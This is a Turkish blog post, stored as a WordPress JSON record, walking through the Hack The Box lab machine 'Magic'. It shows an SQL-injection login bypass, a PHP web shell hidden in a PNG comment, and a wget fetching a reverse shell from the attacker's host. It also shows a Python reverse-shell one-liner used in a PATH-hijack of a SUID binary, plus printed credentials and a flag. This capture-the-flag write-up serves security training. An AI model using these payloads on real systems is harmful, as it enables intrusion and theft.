{"id":1503,"date":"2021-08-13T11:46:57","date_gmt":"2021-08-13T11:46:57","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1503"},"modified":"2021-08-13T11:46:57","modified_gmt":"2021-08-13T11:46:57","slug":"magic","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/13\/magic\/","title":{"rendered":"Magic"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Magic\/walkthroughs\" title=\"Magic\">Magic<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/73eebbbdfbbfd46258ea2ae7e52d9479.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)\n|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)\n|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Magic Portfolio\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>index sayfas\u0131na gitti\u011fimde bir login sayfas\u0131 beni\u015f kar\u015f\u0131lad\u0131 ve <code>x&#039; or 1=1 or &#039;x&#039;=&#039;y<\/code> payload\u0131 ile sqli'dan yararlan\u0131p giri\u015f yapt\u0131m. Kar\u015f\u0131mda bir file upload sayfas\u0131 vard\u0131 ve sadece png gibi uzant\u0131lar\u0131 kabul edyor. Makinenin ad\u0131ndan da Magic bytl'lar\u0131 kullanmama gerekti\u011fini biliyorum. G\u00fczel ipucu.<\/p>\n<p>Bir foto\u011fraf buldum internetten ve foto\u011frafa yorum olarak web shell koyduym.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# exiftool -Comment=&#039;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#039; a.png \n    1 image files updated\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# mv a.png a.php.png<\/code><\/pre>\n<p>K\u00fc\u00e7\u00fck bir deneme yapt\u0131\u011f\u0131mda<br \/>\n<strong><a href=\"http:\/\/10.10.10.185\/images\/uploads\/a.php.png?cmd=ls%20-al\">http:\/\/10.10.10.185\/images\/uploads\/a.php.png?cmd=ls%20-al<\/a><\/strong> ba\u015far\u0131l\u0131 oldum. Sahip oldu\u011fum kullan\u0131c\u0131 ile dosya yazma hakk\u0131m\u0131n oldu\u011funu anlay\u0131nca php-reverse shell upload ettim.<\/p>\n<pre><code>http:\/\/10.10.10.185\/images\/uploads\/a.php.png?cmd=wget%20http:\/\/10.10.14.12\/php-reverse-shell.txt%20-o%20\/tmp\/php-reverse-shell.php<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Magic]\n\u2514\u2500# python3 -m http.server 80                     \nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n10.10.10.185 - - [12\/Aug\/2021 15:09:44] &quot;GET \/php-reverse-shell.txt HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<p><a href=\"http:\/\/10.10.10.185\/images\/uploads\/php-reverse-shell.php\">http:\/\/10.10.10.185\/images\/uploads\/php-reverse-shell.php<\/a> sayfas\u0131na gitti\u011fimde reverse elde ettim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Magic]\n\u2514\u2500# nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.10.185: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.185] 53980\nLinux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\n 12:14:02 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ \n<\/code><\/pre>\n<p>\u0130\u00e7eri girdikten sonra bir cred elde ettim ancak deneme yapt\u0131\u011f\u0131mda ba\u015far\u0131l\u0131 olamad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n$ pwd\n\/var\/www\/Magic\n$ cat db.php5\n&lt;?php\nclass Database\n{\n    private static $dbName = &#039;Magic&#039; ;\n    private static $dbHost = &#039;localhost&#039; ;\n    private static $dbUsername = &#039;theseus&#039;;\n    private static $dbUserPassword = &#039;iamkingtheseus&#039;;\n\n    private static $cont  = null;\n\n    public function __construct() {\n        die(&#039;Init function is not allowed&#039;);\n    }\n\n    public static function connect()\n    {\n        \/\/ One connection through whole application\n        if ( null == self::$cont )\n        {\n            try\n            {\n                self::$cont =  new PDO( &quot;mysql:host=&quot;.self::$dbHost.&quot;;&quot;.&quot;dbname=&quot;.self::$dbName, self::$dbUsername, self::$dbUserPassword);\n            }\n            catch(PDOException $e)\n            {\n                die($e-&gt;getMessage());\n            }\n        }\n        return self::$cont;\n    }\n\n    public static function disconnect()\n    {\n        self::$cont = null;\n    }\n}\n<\/code><\/pre>\n<p>Bu arada <code>\/usr\/bin\/script -qc \/bin\/bash \/dev\/null<\/code> ttl spawn i\u00e7in \u00e7ok ba\u015far\u0131l\u0131 buldu\u011fum bir komut dizisi...<\/p>\n<p>Local portlarada bakt\u0131\u011f\u0131m\u0131zda mysql oldu\u011funu anlayabiliyoruz.<\/p>\n<pre><code>[*] net000 Services listening only on localhost.........\n................... yes!\n---\ntcp    LISTEN   0        5               127.0.0.1:631            0.0.0.0:*     \ntcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     \n---\n<\/code><\/pre>\n<p>Ancak bir t\u00fcrl\u00fc mysql ba\u011flant\u0131s\u0131 kuramad\u0131m. Bunun \u00fczerine php kodu yaz\u0131p manuel denedim. Sonra bu scripti sunucuya att\u0131m ve yeni cred'ler elde ettim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Magic]\n\u2514\u2500# cat testmysql.php             \n&lt;?php\n\n $dbName = &#039;Magic&#039; ;\n $dbHost = &#039;localhost&#039; ;\n   $dbUsername = &#039;theseus&#039;;\n  $dbUserPassword = &#039;iamkingtheseus&#039;;\n\n$cont =  new PDO( &quot;mysql:host=&quot;.$dbHost.&quot;;&quot;.&quot;dbname=&quot;.$dbName, $dbUsername, $dbUserPassword);\n\n $stmt = $cont-&gt;query(&quot;SELECT * FROM login &quot;);\n\n echo &#039;&lt;pre&gt;&#039;; print_r($stmt-&gt;fetch()); echo &#039;&lt;\/pre&gt;&#039;;\n\n ?&gt;<\/code><\/pre>\n<pre><code class=\"language-sh\">\n$ wget http:\/\/10.10.14.12\/testmysql.php\n--2021-08-13 02:47:19--  http:\/\/10.10.14.12\/testmysql.php\nConnecting to 10.10.14.12:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 338 [application\/octet-stream]\nSaving to: &#039;testmysql.php&#039;\n\n     0K                                                       100% 39.6M=0s\n\n2021-08-13 02:47:19 (39.6 MB\/s) - &#039;testmysql.php&#039; saved [338\/338]<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Magic]\n\u2514\u2500# curl http:\/\/10.10.10.185\/testmysql.php\n&lt;pre&gt;Array\n(\n    [id] =&gt; 1\n    [0] =&gt; 1\n    [username] =&gt; admin\n    [1] =&gt; admin\n    [password] =&gt; Th3s3usW4sK1ng\n    [2] =&gt; Th3s3usW4sK1ng\n)\n&lt;\/pre&gt;<\/code><\/pre>\n<p>Bu sefer ba\u015far\u0131l\u0131 oldum.<\/p>\n<pre><code class=\"language-sh\">$ \/usr\/bin\/script -qc \/bin\/bash \/dev\/null\nwww-data@ubuntu:\/var\/www\/Magic$ ls \/home\nls \/home\ntheseus\nwww-data@ubuntu:\/var\/www\/Magic$ su theseus\nsu theseus\nPassword: Th3s3usW4sK1ng\n\ntheseus@ubuntu:\/var\/www\/Magic$ <\/code><\/pre>\n<pre><code class=\"language-sh\">\ntheseus@ubuntu:~$ cat user.txt\ncat user.txt\n3c2c70d62176dedf7d0933e5284f0b9c\ntheseus@ubuntu:~$ <\/code><\/pre>\n<p>enum apmaya deva ederken <code>\/bin\/sysinfo<\/code> dosyas\u0131n\u0131n suid bitinin aktif oldu\u011funu g\u00f6rd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">\ntheseus@ubuntu:\/tmp$ strings \/bin\/sysinfo\n\/lib64\/ld-linux-x86-64.so.2\nlibstdc++.so.6\n__gmon_start__\n_ITM_deregisterTMCloneTable\n_ITM_registerTMCloneTable\n_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKNSt7__cxx1112basic_stringIS4_S5_T1_EE\n_ZNSt13runtime_errorC1EPKc\n_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc\n_ZNSt8ios_base4InitD1Ev\n_ZNSolsEPFRSoS_E\n__gxx_personality_v0\n__cxa_allocate_exception\n_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_\n_ZNSt8ios_base4InitC1Ev\n_ZTISt13runtime_error\n_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev\n__cxa_throw\n_ZNSt13runtime_errorD1Ev\n_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc\n__cxa_free_exception\n_ZSt4cout\n_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev\nlibgcc_s.so.1\n_Unwind_Resume\nlibc.so.6\nsetuid\n__stack_chk_fail\npopen\nfgets\n__cxa_atexit\npclose\n__cxa_finalize\nsetgid\n__libc_start_main\nGCC_3.0\nCXXABI_1.3\nGLIBCXX_3.4\nGLIBCXX_3.4.21\nGLIBC_2.4\nGLIBC_2.2.5\n%z! \n%r! \n%j! \n%b! \n%Z! \n%R! \n%J! \n%B! \n%:! \n%2! \n%*! \n=Q! \n=O  \nATSH\n[A\\]\nATSH\n [A\\]\nATSH\n [A\\]\nAWAVI\nAUATL\n[]A\\A]A^A_\npopen() failed!\n====================Hardware Info====================\nlshw -short\n====================Disk Info====================\nfdisk -l\n====================CPU Info====================\ncat \/proc\/cpuinfo\n====================MEM Usage=====================\nfree -h\n<\/code><\/pre>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere kulland\u0131\u011f\u0131 bir tak\u0131m tool'lar var. Path'i manip\u00fcle ettim.<\/p>\n<pre><code class=\"language-sh\">\ntheseus@ubuntu:\/tmp$ $PATH\n-bash: \/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin: No such file or directory\ntheseus@ubuntu:\/tmp$ PATH=\/tmp:$PATH\n<\/code><\/pre>\n<p>cat komutunu de\u011fi\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">\ntheseus@ubuntu:\/tmp$ more cat\npython3 -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.12&quot;,1111));os.dup2(s.fileno(),0\n);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/sh&quot;)&#039;\n\ntheseus@ubuntu:\/tmp$ chmod 777 cat\n\ntheseus@ubuntu:\/tmp$ id\nuid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)<\/code><\/pre>\n<p>Dinleme noktam\u0131 ba\u015flat\u0131p <code>\/bin\/sysinfo<\/code> arac\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\ntheseus@ubuntu:\/tmp$ \/bin\/sysinfo\n====================Hardware Info====================\nH\/W path           Device     Class      Description\n====================================================\n                              system     VMware Virtual Platform\n\/0                            bus        440BX Desktop Reference Platform\n\/0\/0                          memory     86KiB BIOS\n\/0\/1                          processor  AMD EPYC 7401P 24-Core Processor\n\/0\/1\/0                        memory     16KiB L1 cache\n\/0\/1\/1                        memory     16KiB L1 cache\n\/0\/1\/2                        memory     512KiB L2 cache\n\/0\/1\/3                        memory     512KiB L2 cache\n\/0\/2                          processor  AMD EPYC 7401P 24-Core Processor\n\/0\/28                         memory     System Memory\n\/0\/28\/0                       memory     4GiB DIMM DRAM EDO\n\/0\/28\/1                       memory     DIMM DRAM [empty]\n\/0\/28\/2                       memory     DIMM DRAM [empty]\n\/0\/28\/3                       memory     DIMM DRAM [empty]\n\/0\/28\/4                       memory     DIMM DRAM [empty]\n\/0\/28\/5                       memory     DIMM DRAM [empty]\n\/0\/28\/6                       memory     DIMM DRAM [empty]\n\/0\/28\/7                       memory     DIMM DRAM [empty]\n\/0\/28\/8                       memory     DIMM DRAM [empty]\n\/0\/28\/9                       memory     DIMM DRAM [empty]\n\/0\/28\/a                       memory     DIMM DRAM [empty]\n\/0\/28\/b                       memory     DIMM DRAM [empty]\n\/0\/28\/c                       memory     DIMM DRAM [empty]\n\/0\/28\/d                       memory     DIMM DRAM [empty]\n\/0\/28\/e                       memory     DIMM DRAM [empty]\n\/0\/28\/f                       memory     DIMM DRAM [empty]\n\/0\/28\/10                      memory     DIMM DRAM [empty]\n\/0\/28\/11                      memory     DIMM DRAM [empty]\n\/0\/28\/12                      memory     DIMM DRAM [empty]\n\/0\/28\/13                      memory     DIMM DRAM [empty]\n\/0\/28\/14                      memory     DIMM DRAM [empty]\n\/0\/28\/15                      memory     DIMM DRAM [empty]\n\/0\/28\/16                      memory     DIMM DRAM [empty]\n\/0\/28\/17                      memory     DIMM DRAM [empty]\n\/0\/28\/18                      memory     DIMM DRAM [empty]\n\/0\/28\/19                      memory     DIMM DRAM [empty]\n\/0\/28\/1a                      memory     DIMM DRAM [empty]\n\/0\/28\/1b                      memory     DIMM DRAM [empty]\n\/0\/28\/1c                      memory     DIMM DRAM [empty]\n\/0\/28\/1d                      memory     DIMM DRAM [empty]\n\/0\/28\/1e                      memory     DIMM DRAM [empty]\n\/0\/28\/1f                      memory     DIMM DRAM [empty]\n\/0\/28\/20                      memory     DIMM DRAM [empty]\n\/0\/28\/21                      memory     DIMM DRAM [empty]\n\/0\/28\/22                      memory     DIMM DRAM [empty]\n\/0\/28\/23                      memory     DIMM DRAM [empty]\n\/0\/28\/24                      memory     DIMM DRAM [empty]\n\/0\/28\/25                      memory     DIMM DRAM [empty]\n\/0\/28\/26                      memory     DIMM DRAM [empty]\n\/0\/28\/27                      memory     DIMM DRAM [empty]\n\/0\/28\/28                      memory     DIMM DRAM [empty]\n\/0\/28\/29                      memory     DIMM DRAM [empty]\n\/0\/28\/2a                      memory     DIMM DRAM [empty]\n\/0\/28\/2b                      memory     DIMM DRAM [empty]\n\/0\/28\/2c                      memory     DIMM DRAM [empty]\n\/0\/28\/2d                      memory     DIMM DRAM [empty]\n\/0\/28\/2e                      memory     DIMM DRAM [empty]\n\/0\/28\/2f                      memory     DIMM DRAM [empty]\n\/0\/28\/30                      memory     DIMM DRAM [empty]\n\/0\/28\/31                      memory     DIMM DRAM [empty]\n\/0\/28\/32                      memory     DIMM DRAM [empty]\n\/0\/28\/33                      memory     DIMM DRAM [empty]\n\/0\/28\/34                      memory     DIMM DRAM [empty]\n\/0\/28\/35                      memory     DIMM DRAM [empty]\n\/0\/28\/36                      memory     DIMM DRAM [empty]\n\/0\/28\/37                      memory     DIMM DRAM [empty]\n\/0\/28\/38                      memory     DIMM DRAM [empty]\n\/0\/28\/39                      memory     DIMM DRAM [empty]\n\/0\/28\/3a                      memory     DIMM DRAM [empty]\n\/0\/28\/3b                      memory     DIMM DRAM [empty]\n\/0\/28\/3c                      memory     DIMM DRAM [empty]\n\/0\/28\/3d                      memory     DIMM DRAM [empty]\n\/0\/28\/3e                      memory     DIMM DRAM [empty]\n\/0\/28\/3f                      memory     DIMM DRAM [empty]\n\/0\/3                          memory     \n\/0\/3\/0                        memory     DIMM [empty]\n\/0\/4                          memory     \n\/0\/4\/0                        memory     DIMM [empty]\n\/0\/5                          memory     \n\/0\/5\/0                        memory     DIMM [empty]\n\/0\/6                          memory     \n\/0\/6\/0                        memory     DIMM [empty]\n\/0\/7                          memory     \n\/0\/7\/0                        memory     DIMM [empty]\n\/0\/8                          memory     \n\/0\/8\/0                        memory     DIMM [empty]\n\/0\/9                          memory     \n\/0\/9\/0                        memory     DIMM [empty]\n\/0\/a                          memory     \n\/0\/a\/0                        memory     DIMM [empty]\n\/0\/b                          memory     \n\/0\/b\/0                        memory     DIMM [empty]\n\/0\/c                          memory     \n\/0\/c\/0                        memory     DIMM [empty]\n\/0\/d                          memory     \n\/0\/d\/0                        memory     DIMM [empty]\n\/0\/e                          memory     \n\/0\/e\/0                        memory     DIMM [empty]\n\/0\/f                          memory     \n\/0\/f\/0                        memory     DIMM [empty]\n\/0\/10                         memory     \n\/0\/10\/0                       memory     DIMM [empty]\n\/0\/11                         memory     \n\/0\/11\/0                       memory     DIMM [empty]\n\/0\/12                         memory     \n\/0\/12\/0                       memory     DIMM [empty]\n\/0\/13                         memory     \n\/0\/13\/0                       memory     DIMM [empty]\n\/0\/14                         memory     \n\/0\/14\/0                       memory     DIMM [empty]\n\/0\/15                         memory     \n\/0\/15\/0                       memory     DIMM [empty]\n\/0\/16                         memory     \n\/0\/16\/0                       memory     DIMM [empty]\n\/0\/17                         memory     \n\/0\/17\/0                       memory     DIMM [empty]\n\/0\/18                         memory     \n\/0\/18\/0                       memory     DIMM [empty]\n\/0\/19                         memory     \n\/0\/19\/0                       memory     DIMM [empty]\n\/0\/1a                         memory     \n\/0\/1a\/0                       memory     DIMM [empty]\n\/0\/1b                         memory     \n\/0\/1b\/0                       memory     DIMM [empty]\n\/0\/1c                         memory     \n\/0\/1c\/0                       memory     DIMM [empty]\n\/0\/1d                         memory     \n\/0\/1d\/0                       memory     DIMM [empty]\n\/0\/1e                         memory     \n\/0\/1e\/0                       memory     DIMM [empty]\n\/0\/1f                         memory     \n\/0\/1f\/0                       memory     DIMM [empty]\n\/0\/20                         memory     \n\/0\/20\/0                       memory     DIMM [empty]\n\/0\/21                         memory     \n\/0\/21\/0                       memory     DIMM [empty]\n\/0\/22                         memory     \n\/0\/22\/0                       memory     DIMM [empty]\n\/0\/23                         memory     \n\/0\/23\/0                       memory     DIMM [empty]\n\/0\/24                         memory     \n\/0\/24\/0                       memory     DIMM [empty]\n\/0\/25                         memory     \n\/0\/25\/0                       memory     DIMM [empty]\n\/0\/26                         memory     \n\/0\/26\/0                       memory     DIMM [empty]\n\/0\/27                         memory     \n\/0\/27\/0                       memory     DIMM [empty]\n\/0\/29                         memory     \n\/0\/29\/0                       memory     DIMM [empty]\n\/0\/2a                         memory     \n\/0\/2a\/0                       memory     DIMM [empty]\n\/0\/2b                         memory     \n\/0\/2b\/0                       memory     DIMM [empty]\n\/0\/2c                         memory     \n\/0\/2c\/0                       memory     DIMM [empty]\n\/0\/2d                         memory     \n\/0\/2d\/0                       memory     DIMM [empty]\n\/0\/2e                         memory     \n\/0\/2e\/0                       memory     DIMM [empty]\n\/0\/2f                         memory     \n\/0\/2f\/0                       memory     DIMM [empty]\n\/0\/30                         memory     \n\/0\/30\/0                       memory     DIMM [empty]\n\/0\/31                         memory     \n\/0\/31\/0                       memory     DIMM [empty]\n\/0\/32                         memory     \n\/0\/32\/0                       memory     DIMM [empty]\n\/0\/33                         memory     \n\/0\/33\/0                       memory     DIMM [empty]\n\/0\/34                         memory     \n\/0\/34\/0                       memory     DIMM [empty]\n\/0\/35                         memory     \n\/0\/35\/0                       memory     DIMM [empty]\n\/0\/36                         memory     \n\/0\/36\/0                       memory     DIMM [empty]\n\/0\/37                         memory     \n\/0\/37\/0                       memory     DIMM [empty]\n\/0\/38                         memory     \n\/0\/38\/0                       memory     DIMM [empty]\n\/0\/39                         memory     \n\/0\/39\/0                       memory     DIMM [empty]\n\/0\/3a                         memory     \n\/0\/3a\/0                       memory     DIMM [empty]\n\/0\/3b                         memory     \n\/0\/3b\/0                       memory     DIMM [empty]\n\/0\/3c                         memory     \n\/0\/3c\/0                       memory     DIMM [empty]\n\/0\/3d                         memory     \n\/0\/3d\/0                       memory     DIMM [empty]\n\/0\/3e                         memory     \n\/0\/3e\/0                       memory     DIMM [empty]\n\/0\/3f                         memory     \n\/0\/3f\/0                       memory     DIMM [empty]\n\/0\/40                         memory     \n\/0\/40\/0                       memory     DIMM [empty]\n\/0\/41                         memory     \n\/0\/41\/0                       memory     DIMM [empty]\n\/0\/42                         memory     \n\/0\/42\/0                       memory     DIMM [empty]\n\/0\/43                         memory     \n\/0\/43\/0                       memory     DIMM [empty]\n\/0\/44                         memory     \n\/0\/45                         memory     \n\/0\/100                        bridge     440BX\/ZX\/DX - 82443BX\/ZX\/DX Host bridge\n\/0\/100\/1                      bridge     440BX\/ZX\/DX - 82443BX\/ZX\/DX AGP bridge\n\/0\/100\/7                      bridge     82371AB\/EB\/MB PIIX4 ISA\n\/0\/100\/7.1                    storage    82371AB\/EB\/MB PIIX4 IDE\n\/0\/100\/7.3                    bridge     82371AB\/EB\/MB PIIX4 ACPI\n\/0\/100\/7.7                    generic    Virtual Machine Communication Interface\n\/0\/100\/f                      display    SVGA II Adapter\n\/0\/100\/10          scsi32     storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI\n\/0\/100\/10\/0.1.0    \/dev\/sda   disk       10GB Virtual disk\n\/0\/100\/10\/0.1.0\/1  \/dev\/sda1  volume     9214MiB EXT4 volume\n\/0\/100\/10\/0.1.0\/2  \/dev\/sda2  volume     1025MiB Linux swap volume\n\/0\/100\/11                     bridge     PCI bridge\n\/0\/100\/11\/0                   bus        USB1.1 UHCI Controller\n\/0\/100\/11\/0\/1      usb2       bus        UHCI Host Controller\n\/0\/100\/11\/0\/1\/1               input      VMware Virtual USB Mouse\n\/0\/100\/11\/0\/1\/2               bus        VMware Virtual USB Hub\n\/0\/100\/11\/1                   bus        USB2 EHCI Controller\n\/0\/100\/11\/1\/1      usb1       bus        EHCI Host Controller\n\/0\/100\/11\/2                   storage    SATA AHCI controller\n\/0\/100\/15                     bridge     PCI Express Root Port\n\/0\/100\/15\/0        ens160     network    VMXNET3 Ethernet Controller\n\/0\/100\/15.1                   bridge     PCI Express Root Port\n\/0\/100\/15.2                   bridge     PCI Express Root Port\n\/0\/100\/15.3                   bridge     PCI Express Root Port\n\/0\/100\/15.4                   bridge     PCI Express Root Port\n\/0\/100\/15.5                   bridge     PCI Express Root Port\n\/0\/100\/15.6                   bridge     PCI Express Root Port\n\/0\/100\/15.7                   bridge     PCI Express Root Port\n\/0\/100\/16                     bridge     PCI Express Root Port\n\/0\/100\/16.1                   bridge     PCI Express Root Port\n\/0\/100\/16.2                   bridge     PCI Express Root Port\n\/0\/100\/16.3                   bridge     PCI Express Root Port\n\/0\/100\/16.4                   bridge     PCI Express Root Port\n\/0\/100\/16.5                   bridge     PCI Express Root Port\n\/0\/100\/16.6                   bridge     PCI Express Root Port\n\/0\/100\/16.7                   bridge     PCI Express Root Port\n\/0\/100\/17                     bridge     PCI Express Root Port\n\/0\/100\/17.1                   bridge     PCI Express Root Port\n\/0\/100\/17.2                   bridge     PCI Express Root Port\n\/0\/100\/17.3                   bridge     PCI Express Root Port\n\/0\/100\/17.4                   bridge     PCI Express Root Port\n\/0\/100\/17.5                   bridge     PCI Express Root Port\n\/0\/100\/17.6                   bridge     PCI Express Root Port\n\/0\/100\/17.7                   bridge     PCI Express Root Port\n\/0\/100\/18                     bridge     PCI Express Root Port\n\/0\/100\/18.1                   bridge     PCI Express Root Port\n\/0\/100\/18.2                   bridge     PCI Express Root Port\n\/0\/100\/18.3                   bridge     PCI Express Root Port\n\/0\/100\/18.4                   bridge     PCI Express Root Port\n\/0\/100\/18.5                   bridge     PCI Express Root Port\n\/0\/100\/18.6                   bridge     PCI Express Root Port\n\/0\/100\/18.7                   bridge     PCI Express Root Port\n\/1                            system     \n\n====================Disk Info====================\nDisk \/dev\/loop0: 164.8 MiB, 172761088 bytes, 337424 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop1: 65.1 MiB, 68259840 bytes, 133320 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop2: 243.9 MiB, 255762432 bytes, 499536 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop3: 956 KiB, 978944 bytes, 1912 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop4: 44.9 MiB, 47063040 bytes, 91920 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop5: 2.5 MiB, 2621440 bytes, 5120 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop6: 548 KiB, 561152 bytes, 1096 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop7: 219 MiB, 229638144 bytes, 448512 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/sda: 10 GiB, 10737418240 bytes, 20971520 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\nDisklabel type: dos\nDisk identifier: 0xf8b0a793\n\nDevice     Boot    Start      End  Sectors Size Id Type\n\/dev\/sda1           2048 18872319 18870272   9G 83 Linux\n\/dev\/sda2       18872320 20971519  2099200   1G 82 Linux swap \/ Solaris\n\nDisk \/dev\/loop8: 160.2 MiB, 167931904 bytes, 327992 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop9: 61.7 MiB, 64729088 bytes, 126424 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop10: 3.7 MiB, 3862528 bytes, 7544 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop11: 91.4 MiB, 95805440 bytes, 187120 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop12: 99.4 MiB, 104202240 bytes, 203520 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop13: 54.7 MiB, 57294848 bytes, 111904 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\nDisk \/dev\/loop14: 55.5 MiB, 58134528 bytes, 113544 sectors\nUnits: sectors of 1 * 512 = 512 bytes\nSector size (logical\/physical): 512 bytes \/ 512 bytes\nI\/O size (minimum\/optimal): 512 bytes \/ 512 bytes\n\n====================CPU Info====================\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Magic]\n\u2514\u2500# nc -lvp 1111\nlistening on [any] 1111 ...\n10.10.10.185: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.185] 58062\n# 